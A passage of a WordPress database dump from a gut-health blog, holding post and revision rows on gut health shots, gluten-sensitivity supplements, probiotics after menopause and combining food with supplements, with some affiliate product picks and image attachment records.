In conclusion, gut health shots can be a valuable addition to your wellness routine, offering potential benefits for digestion, immunity, and even mood. However, like any dietary supplement, they should be used mindfully and in conjunction with a balanced diet and a healthy lifestyle. Ultimately, the key to a healthier gut is a holistic approach that includes a variety of whole foods, stress management, and, if appropriate, the incorporation of gut health shots to support your microbiome.

\n','Title: Are Gut Health Shots Good for You?','','inherit','closed','closed','','5567-revision-v1','','','2023-09-14 08:00:21','2023-09-14 08:00:21','',5567,'https://tummyrevolution.com/?p=5571',0,'revision','',0),(5572,1,'2023-09-14 08:00:56','2023-09-14 08:00:56','\n

In recent years, the health and wellness industry has witnessed a surge in the popularity of gut health shots. These tiny, potent beverages claim to promote a healthy gut microbiome and offer a wide array of health benefits. But are gut health shots really as good for you as they claim to be? Let\'s explore the science behind these shots to find out.

\n\n\n\n

What Are Gut Health Shots?

\n\n\n\n

Gut health shots typically contain a mixture of ingredients designed to support digestive health. Common components include probiotics, prebiotics, and various herbs or spices known for their potential digestive benefits. Probiotics are beneficial bacteria that can help maintain a balanced gut microbiome, while prebiotics serve as food for these bacteria, promoting their growth and activity.

\n\n\n\n

The Benefits of Gut Health Shots:

\n\n\n\n

1. Improved Digestion: Probiotics in gut health shots can help regulate digestion by maintaining a healthy balance of gut bacteria. This can lead to reduced bloating, gas, and other digestive discomforts.

\n\n\n\n

2. Enhanced Nutrient Absorption: A healthy gut microbiome plays a crucial role in absorbing nutrients from the food we eat. Gut health shots can aid in this process, ensuring you get the most out of your diet.

\n\n\n\n

3. Stronger Immune System: A significant portion of the immune system resides in the gut. By promoting a diverse and balanced microbiome, gut health shots may bolster your immunity.

\n\n\n\n

4. Mood and Mental Health: Emerging research suggests a strong connection between gut health and mental well-being. Some people report feeling better mentally and emotionally after incorporating gut health shots into their routine.

\n\n\n\n

What to Consider:

\n\n\n\n

While gut health shots offer promising benefits, there are a few important factors to consider:

\n\n\n\n

1. Individual Variation: Not everyone\'s gut is the same. What works for one person may not have the same effect on another. It\'s essential to listen to your body and monitor how gut health shots affect you personally.

\n\n\n\n

2. Diet and Lifestyle: Gut health is influenced by various factors, including diet, stress levels, and physical activity. Gut health shots should be seen as part of a broader approach to overall well-being.

\n\n\n\n

3. Quality Matters: The effectiveness of gut health shots largely depends on the quality of the ingredients and the specific strains of probiotics included. Be sure to choose products from reputable brands with a track record of producing high-quality supplements.

\n\n\n\n

4. Consult a Professional: If you have specific digestive issues or underlying health concerns, it\'s a good idea to consult with a healthcare professional or a registered dietitian before adding gut health shots to your routine.

\n\n\n\n

In conclusion, gut health shots can be a valuable addition to your wellness routine, offering potential benefits for digestion, immunity, and even mood. However, like any dietary supplement, they should be used mindfully and in conjunction with a balanced diet and a healthy lifestyle. Ultimately, the key to a healthier gut is a holistic approach that includes a variety of whole foods, stress management, and, if appropriate, the incorporation of gut health shots to support your microbiome.

\n','Are Gut Health Shots Good for You?','','inherit','closed','closed','','5567-revision-v1','','','2023-09-14 08:00:56','2023-09-14 08:00:56','',5567,'https://tummyrevolution.com/?p=5572',0,'revision','',0),(5574,1,'2023-10-12 15:59:03','2023-10-12 15:59:03','\n

Gut health shots have gained popularity in recent years for their potential to support digestive wellness and overall health. But, like any health trend, they come with both benefits and drawbacks. In this blog post, we\'ll explore the pros and cons of incorporating gut health shots into your routine. (Or skip to Top 5 health shots to try out 2023 HERE)

\n\n\n\n

Pros:

\n\n\n\n

1. Digestive Health Support: Gut health shots often contain probiotics and prebiotics that can help maintain a balanced gut microbiome. This can lead to improved digestion, reduced bloating, and enhanced nutrient absorption.

\n\n\n\n

2. Immune System Boost: A significant portion of the immune system resides in the gut. By promoting a diverse and healthy gut microbiome, these shots may strengthen your immune defenses.

\n\n\n\n

3. Convenience: Gut health shots are usually small, convenient, and easy to incorporate into your daily routine. They can be consumed on the go, making them a practical choice for busy individuals.

\n\n\n\n

4. Mood and Well-Being: Emerging research suggests a link between gut health and mental well-being. Some people report feeling happier and less anxious after regularly consuming gut health shots.

\n\n\n\n

Cons:

\n\n\n\n

1. Individual Variation: What works wonders for one person may not have the same effect on another. Gut health is highly individual, and not everyone will experience the same benefits.

\n\n\n\n

2. Expense: High-quality gut health shots can be pricey. Regular consumption can add up over time, making them less accessible for those on a tight budget.

\n\n\n\n

3. Quality Control: The effectiveness of these shots depends on the quality of the ingredients and specific probiotic strains used. Some products on the market may not meet the claims they make, so it\'s essential to choose reputable brands.

\n\n\n\n

4. Overconsumption: More isn\'t always better. Excessive consumption of probiotics, especially without a specific need, can lead to gastrointestinal discomfort. It\'s crucial to follow recommended serving sizes.

\n\n\n\n

5. Not a Cure-All: Gut health shots should complement a balanced diet and lifestyle. They aren\'t a magic solution to all health issues. If you have specific digestive problems or underlying health concerns, consult a healthcare professional.

\n\n\n\n

So to summarise, gut health shots can be a valuable tool for promoting digestive health, immunity, and overall well-being. However, they are not a one-size-fits-all solution, and their effectiveness may vary from person to person. To make an informed decision, consider your individual needs, budget, and the quality of the product you choose. If you decide to give them a try, do so in moderation and as part of a holistic approach to wellness, which includes a diverse diet and a healthy lifestyle.

\n\n\n\n

This post contains affiliate links. This means I may earn commission should you choose to make a purchase using my link.

\n\n\n\n

Top 5 heath shots to try out 2023

\n\n\n\n

The Twisted Shot, Apple Cider Vinegar Shots with Turmeric, Ginger, Cinnamon, Honey & Cayenne, 100% USDA Certified Organic, Gut Health

\n\n\n\n\"\"\n\n\n\n

TEAONIC My Gut Mojo: Digest, Detox Drinks For Better Digestion, With Cranberry, Ginger, Cinnamon

\n\n\n\n\"\"\n\n\n\n

Life Equals Organic Fiber, Probiotic, Prebiotic Digestion Superfood Shot Drink- 1/2 Day Organic Fruits and Veggies, Vegan

\n\n\n\n\"\"\n\n\n\n

Vive Organic Immunity Boost Shots

\n\n\n\n\"\"\n\n\n\n

+GNGR Immunity Booster Organic Ginger Shots with Turmeric - Premium Ginger Shots for All Natural Immune Support - Cold Pressed Ginger Juice with Turmeric and Cayenne Pepper

\n\n\n\n\"\"\n','The Pros and Cons of Gut Health Shots','','publish','open','open','','the-pros-and-cons-of-gut-health-shots','','','2023-10-12 15:59:05','2023-10-12 15:59:05','',0,'https://tummyrevolution.com/?p=5574',0,'post','',0),(5575,1,'2023-09-14 09:51:44','2023-09-14 09:51:44','What are the pros and cons of gut health shots','Gut shot health','Pros and cons with gut health shots','inherit','open','closed','','gut-shot-health','','','2023-09-14 09:53:17','2023-09-14 09:53:17','',5574,'http://tummyrevolution.com/wp-content/uploads/2023/09/Gut-shot-health.jpg',0,'attachment','image/jpeg',0),(5576,1,'2023-09-14 09:51:51','2023-09-14 09:51:51','','Health shots Gut','','inherit','open','closed','','health-shots-gut','','','2023-09-14 09:51:51','2023-09-14 09:51:51','',5574,'http://tummyrevolution.com/wp-content/uploads/2023/09/Health-shots-Gut.jpg',0,'attachment','image/jpeg',0),(5577,1,'2023-09-14 09:51:56','2023-09-14 09:51:56','','Juice shots','','inherit','open','closed','','juice-shots','','','2023-09-14 09:51:56','2023-09-14 09:51:56','',5574,'http://tummyrevolution.com/wp-content/uploads/2023/09/Juice-shots.jpg',0,'attachment','image/jpeg',0),(5578,1,'2023-09-14 09:52:07','2023-09-14 09:52:07','','Living a healthy life','','inherit','open','closed','','living-a-healthy-life','','','2023-09-14 09:52:07','2023-09-14 09:52:07','',5574,'http://tummyrevolution.com/wp-content/uploads/2023/09/Living-a-healthy-life.jpg',0,'attachment','image/jpeg',0),(5579,1,'2023-09-14 09:54:14','2023-09-14 09:54:14','','Gut shot health','','inherit','open','closed','','gut-shot-health-2','','','2023-09-14 09:54:14','2023-09-14 09:54:14','',5574,'http://tummyrevolution.com/wp-content/uploads/2023/09/Gut-shot-health-1.jpg',0,'attachment','image/jpeg',0),(5580,1,'2023-09-14 09:54:36','2023-09-14 09:54:36','\n

Gut health shots have gained popularity in recent years for their potential to support digestive wellness and overall health. But, like any health trend, they come with both benefits and drawbacks. In this blog post, we\'ll explore the pros and cons of incorporating gut health shots into your routine.

\n\n\n\n

Pros:

\n\n\n\n

1. Digestive Health Support: Gut health shots often contain probiotics and prebiotics that can help maintain a balanced gut microbiome. This can lead to improved digestion, reduced bloating, and enhanced nutrient absorption.

\n\n\n\n

2. Immune System Boost: A significant portion of the immune system resides in the gut. By promoting a diverse and healthy gut microbiome, these shots may strengthen your immune defenses.

\n\n\n\n

3. Convenience: Gut health shots are usually small, convenient, and easy to incorporate into your daily routine. They can be consumed on the go, making them a practical choice for busy individuals.

\n\n\n\n

4. Mood and Well-Being: Emerging research suggests a link between gut health and mental well-being. Some people report feeling happier and less anxious after regularly consuming gut health shots.

\n\n\n\n

Cons:

\n\n\n\n

1. Individual Variation: What works wonders for one person may not have the same effect on another. Gut health is highly individual, and not everyone will experience the same benefits.

\n\n\n\n

2. Expense: High-quality gut health shots can be pricey. Regular consumption can add up over time, making them less accessible for those on a tight budget.

\n\n\n\n

3. Quality Control: The effectiveness of these shots depends on the quality of the ingredients and specific probiotic strains used. Some products on the market may not meet the claims they make, so it\'s essential to choose reputable brands.

\n\n\n\n

4. Overconsumption: More isn\'t always better. Excessive consumption of probiotics, especially without a specific need, can lead to gastrointestinal discomfort. It\'s crucial to follow recommended serving sizes.

\n\n\n\n

5. Not a Cure-All: Gut health shots should complement a balanced diet and lifestyle. They aren\'t a magic solution to all health issues. If you have specific digestive problems or underlying health concerns, consult a healthcare professional.

\n\n\n\n

In conclusion, gut health shots can be a valuable tool for promoting digestive health, immunity, and overall well-being. However, they are not a one-size-fits-all solution, and their effectiveness may vary from person to person. To make an informed decision, consider your individual needs, budget, and the quality of the product you choose. If you decide to give them a try, do so in moderation and as part of a holistic approach to wellness, which includes a diverse diet and a healthy lifestyle.

\n\n\n\n

Gut health shots are small, concentrated beverages designed to support and promote a healthy gut microbiome. They typically contain a combination of ingredients that can include probiotics, prebiotics, herbs, spices, and other nutrients that are believed to have digestive health benefits. Here\'s a breakdown of some common components found in gut health shots:

\n\n\n\n

1. Probiotics: Probiotics are live beneficial bacteria that are known to have a positive impact on gut health. Gut health shots may contain specific strains of probiotics that can help maintain a balanced and diverse gut microbiome.

\n\n\n\n

2. Prebiotics: Prebiotics are non-digestible fibers that serve as food for probiotics, promoting their growth and activity in the gut. Including prebiotics in gut health shots can help support the probiotics\' effectiveness.

\n\n\n\n

3. Herbs and Spices: Some gut health shots contain herbs and spices known for their potential digestive benefits. For example, ginger and turmeric are often added for their anti-inflammatory properties and potential to alleviate digestive discomfort.

\n','The Pros and Cons of Gut Health Shots','','inherit','closed','closed','','5574-revision-v1','','','2023-09-14 09:54:36','2023-09-14 09:54:36','',5574,'https://tummyrevolution.com/?p=5580',0,'revision','',0),(5581,1,'2023-09-14 10:14:17','0000-00-00 00:00:00','\n

Gluten sensitivity is a complex and poorly understood condition, and there is currently no known cure or specific treatment for it. The primary approach to managing gluten sensitivity is to avoid consuming gluten-containing foods.

\n\n\n\n

However, if you have gluten sensitivity, there are some supplements and dietary strategies that may help support your overall health and alleviate some of the symptoms associated with gluten sensitivity. Keep in mind that it\'s important to consult with a healthcare professional before adding any supplements to your diet, as they can provide personalized guidance based on your individual health needs. Here are some supplements and strategies to consider:

\n\n\n\n
    \n
  1. Probiotics: Some people with gluten sensitivity report improved digestive symptoms when taking probiotic supplements. Probiotics may help support gut health and balance the gut microbiota. However, their effectiveness can vary from person to person.
  2. \n\n\n\n
  3. Digestive Enzymes: Digestive enzyme supplements may help some individuals better digest gluten and other foods. Look for enzymes that specifically target gluten and wheat proteins. However, these supplements are not a guarantee that you can consume gluten without symptoms, so it\'s important to continue avoiding gluten-containing foods.
  4. \n\n\n\n
  5. L-Glutamine: L-glutamine is an amino acid that is thought to support the integrity of the intestinal lining. It may be helpful for some people with gastrointestinal symptoms associated with gluten sensitivity.
  6. \n\n\n\n
  7. Vitamin and Mineral Supplements: If your diet is restricted due to gluten sensitivity, you may be at risk of certain nutrient deficiencies. Consult with a healthcare provider to determine if you need supplements to address any deficiencies. Common deficiencies associated with gluten sensitivity may include vitamins D and B12, iron, and calcium.
  8. \n\n\n\n
  9. Anti-Inflammatory Supplements: Gluten sensitivity can sometimes trigger inflammation in the body. Omega-3 fatty acids (found in fish oil supplements) and curcumin (the active compound in turmeric) have anti-inflammatory properties and may be considered as supplements. However, their effectiveness can vary, and they should not replace a gluten-free diet.
  10. \n\n\n\n
  11. Stress Management: Stress can exacerbate gastrointestinal symptoms. Practicing stress-reduction techniques such as meditation, yoga, or deep breathing exercises may help manage symptoms associated with gluten sensitivity.
  12. \n
\n\n\n\n

Remember that dietary and lifestyle changes, including strict adherence to a gluten-free diet, are the most effective ways to manage gluten sensitivity and reduce symptoms. Supplements should be viewed as supportive measures and not as a replacement for avoiding gluten-containing foods. Always consult with a healthcare provider for personalized guidance and recommendations based on your specific health needs.

\n','What supplements can I take to reduce gluten sensitivity','','draft','open','open','','','','','2023-09-14 10:14:17','2023-09-14 10:14:17','',0,'https://tummyrevolution.com/?p=5581',0,'post','',0),(5582,1,'2023-09-14 10:10:46','2023-09-14 10:10:46','What supplements to take to help with gluten sensitivity','Gluten Senstivity','','inherit','open','closed','','gluten-senstivity','','','2023-09-14 10:12:26','2023-09-14 10:12:26','',5581,'http://tummyrevolution.com/wp-content/uploads/2023/09/Gluten-Senstivity.jpg',0,'attachment','image/jpeg',0),(5583,1,'2023-09-14 10:14:15','2023-09-14 10:14:15','\n

Gluten sensitivity is a complex and poorly understood condition, and there is currently no known cure or specific treatment for it. The primary approach to managing gluten sensitivity is to avoid consuming gluten-containing foods.

\n\n\n\n

However, if you have gluten sensitivity, there are some supplements and dietary strategies that may help support your overall health and alleviate some of the symptoms associated with gluten sensitivity. Keep in mind that it\'s important to consult with a healthcare professional before adding any supplements to your diet, as they can provide personalized guidance based on your individual health needs. Here are some supplements and strategies to consider:

\n\n\n\n
    \n
  1. Probiotics: Some people with gluten sensitivity report improved digestive symptoms when taking probiotic supplements. Probiotics may help support gut health and balance the gut microbiota. However, their effectiveness can vary from person to person.
  2. \n\n\n\n
  3. Digestive Enzymes: Digestive enzyme supplements may help some individuals better digest gluten and other foods. Look for enzymes that specifically target gluten and wheat proteins. However, these supplements are not a guarantee that you can consume gluten without symptoms, so it\'s important to continue avoiding gluten-containing foods.
  4. \n\n\n\n
  5. L-Glutamine: L-glutamine is an amino acid that is thought to support the integrity of the intestinal lining. It may be helpful for some people with gastrointestinal symptoms associated with gluten sensitivity.
  6. \n\n\n\n
  7. Vitamin and Mineral Supplements: If your diet is restricted due to gluten sensitivity, you may be at risk of certain nutrient deficiencies. Consult with a healthcare provider to determine if you need supplements to address any deficiencies. Common deficiencies associated with gluten sensitivity may include vitamins D and B12, iron, and calcium.
  8. \n\n\n\n
  9. Anti-Inflammatory Supplements: Gluten sensitivity can sometimes trigger inflammation in the body. Omega-3 fatty acids (found in fish oil supplements) and curcumin (the active compound in turmeric) have anti-inflammatory properties and may be considered as supplements. However, their effectiveness can vary, and they should not replace a gluten-free diet.
  10. \n\n\n\n
  11. Stress Management: Stress can exacerbate gastrointestinal symptoms. Practicing stress-reduction techniques such as meditation, yoga, or deep breathing exercises may help manage symptoms associated with gluten sensitivity.
  12. \n
\n\n\n\n

Remember that dietary and lifestyle changes, including strict adherence to a gluten-free diet, are the most effective ways to manage gluten sensitivity and reduce symptoms. Supplements should be viewed as supportive measures and not as a replacement for avoiding gluten-containing foods. Always consult with a healthcare provider for personalized guidance and recommendations based on your specific health needs.

\n','What supplements can I take to reduce gluten sensitivity','','inherit','closed','closed','','5581-revision-v1','','','2023-09-14 10:14:15','2023-09-14 10:14:15','',5581,'https://tummyrevolution.com/?p=5583',0,'revision','',0),(5586,3,'2023-09-14 12:48:01','2023-09-14 12:48:01','\n

Gut health is important for people of all ages, but it becomes particularly crucial after menopause due to changes in hormone levels that can affect digestion and overall well-being. Probiotics can be a helpful addition to your diet to support gut health during and after menopause. However, it\'s important to note that the effectiveness of specific probiotics can vary from person to person, so what works best for one individual may not be the same for another.

\n\n\n\n

This post contains affiliate links. This means I may earn a commission should you choose to make a purchase using my link.

\n\n\n\n

That said, here are some probiotic strains and foods that may help support gut health after menopause:

\n\n\n\n

Lactobacillus Acidophilus: This probiotic strain is well-known for its ability to maintain a healthy balance of beneficial bacteria in the gut. It can be found in yogurt and other fermented dairy products.

\n\n\n\n

Recommended Product

\n\n\n\n\"\"\n\n\n\n

Bifidobacterium: Various species of Bifidobacterium, such as Bifidobacterium bifidum and Bifidobacterium longum, are associated with digestive health and may help alleviate common digestive issues that can occur after menopause.

\n\n\n\n

Recommended Product

\n\n\n\n\"\"\n\n\n\n

Lactobacillus Rhamnosus: This strain is believed to help improve gut health and may be particularly beneficial for women experiencing digestive discomfort during menopause.

\n\n\n\n

Recommended Product

\n\n\n\n\"\"\n\n\n\n


Lactobacillus Casei: Known for its ability to support the immune system and promote digestive health, this strain is often found in yogurt and fermented foods.

\n\n\n\n

Recommended Product

\n\n\n\n\"\"\n\n\n\n

Saccharomyces Boulardii: This beneficial yeast can help support a healthy gut microbiome and may be especially useful if you\'re prone to digestive issues.

\n\n\n\n

Recommended Product

\n\n\n\n\"\"\n\n\n\n

Fermented Foods: In addition to probiotic supplements, incorporating fermented foods like kimchi, sauerkraut, kefir, and kombucha into your diet can provide a natural source of probiotics to support gut health.

\n\n\n\n

Prebiotic Foods: Prebiotics are non-digestible fibers that feed the beneficial bacteria in your gut. Foods like garlic, onions, leeks, asparagus, and bananas are rich in prebiotics and can complement your probiotic intake.

\n\n\n\n

When choosing probiotic supplements, it\'s essential to look for products that contain these specific strains or a combination of them. Additionally, ensure that the supplement provides an adequate number of live cultures (CFUs) to be effective. Consult with a healthcare professional before starting any new supplement regimen, as they can provide personalized recommendations based on your health needs and any specific digestive issues you may be experiencing.

\n\n\n\n

Summary

\n\n\n\n

Maintaining good gut health after menopause is important for overall well-being. Probiotic-rich foods and supplements can be beneficial, but individual responses may vary. A balanced diet, rich in fiber and low in processed foods, is also crucial for supporting a healthy gut during and after menopause.

\n','The Best Probiotics to Support Your Gut Health During & After Menopause','','publish','open','open','','the-best-probiotics-to-support-your-gut-health-after-menopause','','','2023-10-10 14:12:39','2023-10-10 14:12:39','',0,'https://tummyrevolution.com/?p=5586',0,'post','',1),(5587,3,'2023-09-14 12:46:15','2023-09-14 12:46:15','','erik-dungan-MQyCrJVFG8U-unsplash','','inherit','open','closed','','erik-dungan-mqycrjvfg8u-unsplash','','','2023-09-14 12:46:15','2023-09-14 12:46:15','',5586,'http://tummyrevolution.com/wp-content/uploads/2023/09/erik-dungan-MQyCrJVFG8U-unsplash.jpg',0,'attachment','image/jpeg',0),(5588,3,'2023-09-14 12:48:01','2023-09-14 12:48:01','\n

Gut health is important for people of all ages, but it becomes particularly crucial after menopause due to changes in hormone levels that can affect digestion and overall well-being. Probiotics can be a helpful addition to your diet to support gut health during and after menopause. However, it\'s important to note that the effectiveness of specific probiotics can vary from person to person, so what works best for one individual may not be the same for another. That said, here are some probiotic strains and foods that may help support gut health after menopause:

\n\n\n\n

Lactobacillus acidophilus: This probiotic strain is well-known for its ability to maintain a healthy balance of beneficial bacteria in the gut. It can be found in yogurt and other fermented dairy products.

\n\n\n\n

Bifidobacterium: Various species of Bifidobacterium, such as Bifidobacterium bifidum and Bifidobacterium longum, are associated with digestive health and may help alleviate common digestive issues that can occur after menopause.

\n\n\n\n

Lactobacillus rhamnosus: This strain is believed to help improve gut health and may be particularly beneficial for women experiencing digestive discomfort during menopause.
Lactobacillus casei: Known for its ability to support the immune system and promote digestive health, this strain is often found in yogurt and fermented foods.

\n\n\n\n

Saccharomyces boulardii: This beneficial yeast can help support a healthy gut microbiome and may be especially useful if you\'re prone to digestive issues.

\n\n\n\n

Fermented Foods: In addition to probiotic supplements, incorporating fermented foods like kimchi, sauerkraut, kefir, and kombucha into your diet can provide a natural source of probiotics to support gut health.

\n\n\n\n

Prebiotic Foods: Prebiotics are non-digestible fibers that feed the beneficial bacteria in your gut. Foods like garlic, onions, leeks, asparagus, and bananas are rich in prebiotics and can complement your probiotic intake.

\n\n\n\n

When choosing probiotic supplements, it\'s essential to look for products that contain these specific strains or a combination of them. Additionally, ensure that the supplement provides an adequate number of live cultures (CFUs) to be effective. Consult with a healthcare professional before starting any new supplement regimen, as they can provide personalized recommendations based on your health needs and any specific digestive issues you may be experiencing.

\n\n\n\n

Summary

\n\n\n\n

Maintaining good gut health after menopause is important for overall well-being. Probiotic-rich foods and supplements can be beneficial, but individual responses may vary. A balanced diet, rich in fiber and low in processed foods, is also crucial for supporting a healthy gut during and after menopause.

\n','The Best Probiotics to Support Your Gut Health After Menopause','','inherit','closed','closed','','5586-revision-v1','','','2023-09-14 12:48:01','2023-09-14 12:48:01','',5586,'https://tummyrevolution.com/?p=5588',0,'revision','',0),(5589,3,'2023-09-14 12:57:54','2023-09-14 12:57:54','','amber-faust-bddhFgk7u2E-unsplash','','inherit','open','closed','','amber-faust-bddhfgk7u2e-unsplash','','','2023-09-14 12:57:54','2023-09-14 12:57:54','',5586,'http://tummyrevolution.com/wp-content/uploads/2023/09/amber-faust-bddhFgk7u2E-unsplash.jpg',0,'attachment','image/jpeg',0),(5590,3,'2023-09-14 12:58:23','2023-09-14 12:58:23','\n

Gut health is important for people of all ages, but it becomes particularly crucial after menopause due to changes in hormone levels that can affect digestion and overall well-being. Probiotics can be a helpful addition to your diet to support gut health during and after menopause. However, it\'s important to note that the effectiveness of specific probiotics can vary from person to person, so what works best for one individual may not be the same for another. That said, here are some probiotic strains and foods that may help support gut health after menopause:

\n\n\n\n

Lactobacillus acidophilus: This probiotic strain is well-known for its ability to maintain a healthy balance of beneficial bacteria in the gut. It can be found in yogurt and other fermented dairy products.

\n\n\n\n

Bifidobacterium: Various species of Bifidobacterium, such as Bifidobacterium bifidum and Bifidobacterium longum, are associated with digestive health and may help alleviate common digestive issues that can occur after menopause.

\n\n\n\n

Lactobacillus rhamnosus: This strain is believed to help improve gut health and may be particularly beneficial for women experiencing digestive discomfort during menopause.
Lactobacillus casei: Known for its ability to support the immune system and promote digestive health, this strain is often found in yogurt and fermented foods.

\n\n\n\n

Saccharomyces boulardii: This beneficial yeast can help support a healthy gut microbiome and may be especially useful if you\'re prone to digestive issues.

\n\n\n\n

Fermented Foods: In addition to probiotic supplements, incorporating fermented foods like kimchi, sauerkraut, kefir, and kombucha into your diet can provide a natural source of probiotics to support gut health.

\n\n\n\n

Prebiotic Foods: Prebiotics are non-digestible fibers that feed the beneficial bacteria in your gut. Foods like garlic, onions, leeks, asparagus, and bananas are rich in prebiotics and can complement your probiotic intake.

\n\n\n\n

When choosing probiotic supplements, it\'s essential to look for products that contain these specific strains or a combination of them. Additionally, ensure that the supplement provides an adequate number of live cultures (CFUs) to be effective. Consult with a healthcare professional before starting any new supplement regimen, as they can provide personalized recommendations based on your health needs and any specific digestive issues you may be experiencing.

\n\n\n\n

Summary

\n\n\n\n

Maintaining good gut health after menopause is important for overall well-being. Probiotic-rich foods and supplements can be beneficial, but individual responses may vary. A balanced diet, rich in fiber and low in processed foods, is also crucial for supporting a healthy gut during and after menopause.

\n','The Best Probiotics to Support Your Gut Health After Menopause','','inherit','closed','closed','','5586-revision-v1','','','2023-09-14 12:58:23','2023-09-14 12:58:23','',5586,'https://tummyrevolution.com/?p=5590',0,'revision','',0),(5591,1,'2023-09-16 07:00:04','0000-00-00 00:00:00','\n

In our quest for optimal health and well-being, the choices we make about our diet and nutritional supplements play a pivotal role. While the debate between whole foods and supplements often rages on, there is growing evidence that combining the two can offer a synergistic approach to a healthier life. Here are some compelling benefits of combining food with supplements:

\n\n\n\n
    \n
  1. Nutrient Synergy: Food is a rich source of vitamins, minerals, and other essential nutrients. When you combine these nutrients with supplements, you create a harmonious blend that can address specific nutritional deficiencies. The diverse range of nutrients in food complements the targeted approach of supplements, ensuring your body gets a well-rounded nutritional boost.
  2. \n\n\n\n
  3. Enhanced Absorption: Certain nutrients are more readily absorbed when consumed with food. For instance, fat-soluble vitamins like A, D, E, and K are better absorbed when ingested alongside dietary fats. By pairing supplements with meals, you optimize the absorption of these critical nutrients, maximizing their effectiveness.
  4. \n\n\n\n
  5. Balanced Diet Support: Achieving a balanced diet can be challenging, especially with busy lifestyles. Supplements can fill in the gaps by providing nutrients that may be lacking in your regular meals. This is particularly beneficial for individuals with dietary restrictions, allergies, or those with limited access to certain foods.
  6. \n\n\n\n
  7. Targeted Health Goals: Supplements can be tailored to address specific health goals or conditions. Whether you\'re aiming to support joint health, boost your immune system, or improve cognitive function, combining the right supplements with a well-rounded diet can help you achieve your wellness objectives more effectively.
  8. \n\n\n\n
  9. Convenience and Consistency: Life often gets in the way of maintaining a perfect diet. Supplements offer a convenient way to ensure consistent intake of essential nutrients, even when fresh, wholesome meals aren\'t readily available. They act as a safety net to prevent nutritional gaps.
  10. \n\n\n\n
  11. Aging Gracefully: As we age, our bodies may have a harder time absorbing certain nutrients from food alone. Supplements can become increasingly important in supporting overall health and vitality as we grow older, aiding in the prevention of age-related deficiencies.
  12. \n\n\n\n
  13. Customized Approach: Everyone\'s nutritional needs are unique. Combining food with supplements allows for a personalized approach to health and wellness. You can tailor your supplement regimen to suit your individual requirements, ensuring you\'re getting what you need, when you need it.
  14. \n
\n\n\n\n

In conclusion, the combination of food and supplements can be a powerful strategy for achieving and maintaining optimal health. Rather than viewing them as competing forces, consider them as allies in your journey towards wellness. Always consult with a healthcare professional or registered dietitian to determine the right supplements for your specific needs and to ensure they complement your diet effectively. When used thoughtfully and in harmony, food and supplements can help you unlock the full potential of a healthier, more vibrant life.

\n\n\n\n

A

\n','Unlocking Wellness: The Synergy of Food and Supplements','','draft','open','open','','','','','2023-09-16 07:00:04','2023-09-16 07:00:04','',0,'https://tummyrevolution.com/?p=5591',0,'post','',0),(5593,1,'2023-09-16 06:58:08','2023-09-16 06:58:08','','josh-millgate-Ddenqo3Fx9Y-unsplash','','inherit','open','closed','','josh-millgate-ddenqo3fx9y-unsplash','','','2023-09-16 06:58:08','2023-09-16 06:58:08','',5591,'http://tummyrevolution.com/wp-content/uploads/2023/09/josh-millgate-Ddenqo3Fx9Y-unsplash.jpg',0,'attachment','image/jpeg',0),(5594,1,'2023-09-16 06:58:22','2023-09-16 06:58:22','','anna-pelzer-IGfIGP5ONV0-unsplash','','inherit','open','closed','','anna-pelzer-igfigp5onv0-unsplash','','','2023-09-16 06:58:22','2023-09-16 06:58:22','',5591,'http://tummyrevolution.com/wp-content/uploads/2023/09/anna-pelzer-IGfIGP5ONV0-unsplash.jpg',0,'attachment','image/jpeg',0),(5595,1,'2023-09-16 07:00:01','2023-09-16 07:00:01','\n

In our quest for optimal health and well-being, the choices we make about our diet and nutritional supplements play a pivotal role. While the debate between whole foods and supplements often rages on, there is growing evidence that combining the two can offer a synergistic approach to a healthier life. Here are some compelling benefits of combining food with supplements:

\n\n\n\n
    \n
  1. Nutrient Synergy: Food is a rich source of vitamins, minerals, and other essential nutrients. When you combine these nutrients with supplements, you create a harmonious blend that can address specific nutritional deficiencies. The diverse range of nutrients in food complements the targeted approach of supplements, ensuring your body gets a well-rounded nutritional boost.
  2. \n\n\n\n
  3. Enhanced Absorption: Certain nutrients are more readily absorbed when consumed with food. For instance, fat-soluble vitamins like A, D, E, and K are better absorbed when ingested alongside dietary fats. By pairing supplements with meals, you optimize the absorption of these critical nutrients, maximizing their effectiveness.
  4. \n\n\n\n
  5. Balanced Diet Support: Achieving a balanced diet can be challenging, especially with busy lifestyles. Supplements can fill in the gaps by providing nutrients that may be lacking in your regular meals. This is particularly beneficial for individuals with dietary restrictions, allergies, or those with limited access to certain foods.
  6. \n\n\n\n
  7. Targeted Health Goals: Supplements can be tailored to address specific health goals or conditions. Whether you\'re aiming to support joint health, boost your immune system, or improve cognitive function, combining the right supplements with a well-rounded diet can help you achieve your wellness objectives more effectively.
  8. \n\n\n\n
  9. Convenience and Consistency: Life often gets in the way of maintaining a perfect diet. Supplements offer a convenient way to ensure consistent intake of essential nutrients, even when fresh, wholesome meals aren\'t readily available. They act as a safety net to prevent nutritional gaps.
  10. \n\n\n\n
  11. Aging Gracefully: As we age, our bodies may have a harder time absorbing certain nutrients from food alone. Supplements can become increasingly important in supporting overall health and vitality as we grow older, aiding in the prevention of age-related deficiencies.
  12. \n\n\n\n
  13. Customized Approach: Everyone\'s nutritional needs are unique. Combining food with supplements allows for a personalized approach to health and wellness. You can tailor your supplement regimen to suit your individual requirements, ensuring you\'re getting what you need, when you need it.
  14. \n
\n\n\n\n

In conclusion, the combination of food and supplements can be a powerful strategy for achieving and maintaining optimal health. Rather than viewing them as competing forces, consider them as allies in your journey towards wellness. Always consult with a healthcare professional or registered dietitian to determine the right supplements for your specific needs and to ensure they complement your diet effectively. When used thoughtfully and in harmony, food and supplements can help you unlock the full potential of a healthier, more vibrant life.

\n\n\n\n

A

\n','Unlocking Wellness: The Synergy of Food and Supplements','','inherit','closed','closed','','5591-revision-v1','','','2023-09-16 07:00:01','2023-09-16 07:00:01','',5591,'https://tummyrevolution.com/?p=5595',0,'revision','',0),(5596,1,'2023-09-17 07:30:57','0000-00-00 00:00:00','\n

Achieving optimal health and well-being often involves a balanced approach that combines nutritious foods with carefully selected supplements. Here\'s a guide to some of the best foods and supplements to consider combining for overall health:

\n\n\n\n
    \n
  1. Omega-3 Fatty Acids:
  2. \n
\n\n\n\n
    \n
  • Food Source: Fatty fish like salmon, mackerel, and sardines.
  • \n\n\n\n
  • Supplement: High-quality fish oil capsules or algae-based omega-3 supplements for vegetarians and vegans.
  • \n\n\n\n
  • Benefits: Supports heart health, reduces inflammation, and aids cognitive function.
  • \n
\n\n\n\n
    \n
  1. Vitamin D:
  2. \n
\n\n\n\n
    \n
  • Food Source: Fatty fish, fortified dairy products, and egg yolks.
